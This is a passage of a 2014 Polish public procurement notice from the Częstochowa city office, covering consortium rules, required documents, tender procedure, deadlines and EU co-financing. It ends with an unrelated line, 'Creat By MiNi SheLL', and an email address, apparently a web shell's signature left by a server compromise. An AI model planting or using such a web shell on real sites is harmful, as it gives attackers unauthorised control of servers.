Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego.
1.4. Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Ww. zobowiązanie musi być załączone do oferty przetargowej w oryginale.
Zamawiający wymaga podania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 tej ustawy.
1.5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku, gdy Wykonawca wykazując spełnianie warunku, o którym mowa w punkcie 5.2. specyfikacji polega na zasobach innych podmiotów, kopie dokumentów potwierdzających spełnianie tych warunków, dotyczących odpowiednio wspólników konsorcjum lub innych podmiotów powinny być poświadczone za zgodność z oryginałem przez wspólników konsorcjum (każdy w odniesieniu do dotyczących go dokumentów) lub przez pełnomocnika konsorcjum, jeżeli będzie miał do tej czynności upoważnienie, a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w odniesieniu do dotyczących go dokumentów).
2. Inne dokumenty wymagane przez zamawiającego:
Wypełniony druk OFERTA, stanowiący załącznik nr 2 do specyfikacji, zawierający oświadczenie, że Wykonawca spełnia wszystkie warunki określone w specyfikacji istotnych warunków zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień publicznych, a także informację, czy wykonawca należy/nie należy do grupy kapitałowej. 
Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej.
Dopuszczalne zmiany umowy:
1. Zamawiający dopuszcza możliwość przesunięcia terminu realizacji zamówienia, jeśli wystąpią obiektywne okoliczności niezależne od Wykonawcy uniemożliwiające wykonanie usługi i jednocześnie wydłużenia okresu realizacji usługi o czas trwania tych okoliczności, w zakresie wszystkich części.
2. Podane liczby godzin i uczestników na poszczególne części są orientacyjne i w toku realizacji umowy liczba godzin może ulec zmianie.
3. Istnieje możliwość dokonania zmiany osób lub zwiększenia ilości osób przewidzianych do wykonania zamówienia, przedstawionych w ofercie przetargowej Wykonawcy, za uprzednią pisemną zgodą Zamawiającego.
4. W przypadku zmiany lub zwiększenia ilości osób przewidzianych do wykonania zamówienia, nowa osoba musi spełniać co najmniej wymagania określone w specyfikacji istotnych warunków zamówienia dla tej osoby.
5. Zamawiający może także zażądać od Wykonawcy zmiany osoby przewidzianej do wykonania zamówienia jeżeli uzna, że nie wykonuje ona należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tej osoby w terminie nie dłuższym niż 14 dni od daty złożenia wniosku Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.czestochowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> lmaciejewska@czestochowa.um.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2014 godzina 09:30, miejsce: Siedziba zamawiającego: Biuro Obsługi Interesanta (parter), stanowisko Wydziału Nadzoru i Administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Otwarcie ofert w dniu 11.08.2014 o dodz. 10:00 w siedzibie zamawiającego, sala 108 (I piętro). 2.Przedmiot zamówienia jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. - Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych Programu Operacyjnego Kapitał Ludzki 2007-2013.
3.Specyfikacja istotnych warunków zamówienia będzie dostępna na stronie internetowej Zamawiającego: http://bip.czestochowa.pl Na tej stronie Zamawiający będzie również zamieszczał pytania i odpowiedzi, modyfikacje SIWZ, odwołania dot. treści ogłoszenia oraz postanowień specyfikacji istotnych warunków zamówienia, ogłoszenie o wyborze najkorzystniejszej oferty. 
4.Organ odpowiedzialny za procedury odwoławcze: Krajowa Izba Odwoławcza przy Prezesie Urzędu Zamówień Publicznych ul. Postępu 17a 02-676 Warszawa POLSKA Tel.: +48 224587801 Adres internetowy:http://www.uzp.gov.pl Faks: +48 224587800 5.Składanie odwołań: Dokładne informacje na temat terminów składania odwołań: W prowadzonym postępowaniu mają zastosowanie przepisy zawarte w dziale VI ustawy Prawo zamówień publicznych - Środki ochrony prawnej. W odniesieniu do odwołań zastosowanie mają także następujące przepisy wykonawcze do ustawy Prawo zamówień publicznych, tj.: a) Rozporządzenie Prezesa Rady Ministrów z dnia 22 marca 2010 r. w sprawie regulaminu postępowania przy rozpoznawaniu odwołań (Dz. U. Nr 48, poz. 280 z późniejszymi zmianami: Dz. U. z 2013 r., poz. 232); b) Rozporządzenie Prezesa Rady Ministrów z dnia 15 marca 2010 r. w sprawie wysokości oraz sposobu pobierania wpisu od odwołania oraz rodzajów kosztów w postępowaniu odwoławczym i sposobu ich rozliczania (Dz. U. Nr 41, poz. 238).6.Źródło, gdzie można uzyskać informacje na temat składania odwołań: Krajowa Izba Odwoławcza przy Prezesie Urzędu Zamówień Publicznych ul. Postępu 17a 02-676 Warszawa POLSKA Tel.: +48 224587801 Adres internetowy:http://www.uzp.gov.pl Faks: +48 224587800 7.Ogłoszenie zostało skierowane do Urzędu Oficjalnych Publikacji Wspólnot Europejskich w dniu ...........2014 r. w celu publikacji w Dzienniku Urzędowym Unii Europejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com